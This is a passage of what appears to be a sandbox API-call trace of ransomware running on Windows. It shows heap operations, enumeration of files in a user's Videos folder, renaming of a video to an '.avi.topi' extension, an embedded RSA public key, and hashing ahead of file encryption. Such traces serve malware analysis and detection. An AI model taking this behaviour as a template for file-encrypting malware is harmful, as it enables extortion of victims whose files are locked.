hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.333] GetCurrentThreadId () returned 0x8c4 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9770 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.334] GetCurrentThreadId () returned 0x8c4 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.335] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\RLbbFrbGkwBtF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\rlbbfrbgkwbtf.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\RLbbFrbGkwBtF.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\rlbbfrbgkwbtf.avi.topi")) returned 1 [0097.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.336] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.337] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6db3e10, ftCreationTime.dwHighDateTime=0x1d5c51e, ftLastAccessTime.dwLowDateTime=0x4ca8f1e0, ftLastAccessTime.dwHighDateTime=0x1d5bf10, ftLastWriteTime.dwLowDateTime=0x4ca8f1e0, ftLastWriteTime.dwHighDateTime=0x1d5bf10, nFileSizeHigh=0x0, nFileSizeLow=0xaaf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RLbbFrbGkwBtF.avi", cAlternateFileName="RLBBFR~1.AVI")) returned 0 [0097.337] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b45e8 | out: hHeap=0x680000) returned 1 [0097.338] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.338] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.338] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\") returned="z4k8sZRNNGS3Ve7W-\\" [0097.338] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0097.338] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0097.338] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.338] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.338] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.338] PathFindFileNameW (pszPath="") returned="" [0097.338] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\LAb0.avi") returned=".avi" [0097.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\LAb0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\lab0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.339] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=2528) returned 1 [0097.339] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.342] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.342] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.343] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.343] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x9e0, lpOverlapped=0x0) returned 1 [0097.343] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.343] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.343] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.343] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.344] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.344] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.344] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.344] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.344] GetLastError () returned 0x0 [0097.344] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.344] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.344] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.344] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.344] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9e0) returned 0x3189d50 [0097.344] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb410 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4da8 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb458 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.345] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e08 | out: hHeap=0x680000) returned 1 [0097.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e08 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4df0 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e08 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.346] GetCurrentThreadId () returned 0x8c4 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9800 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.346] GetCurrentThreadId () returned 0x8c4 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.347] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e20 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.350] RtlAllocateHeap 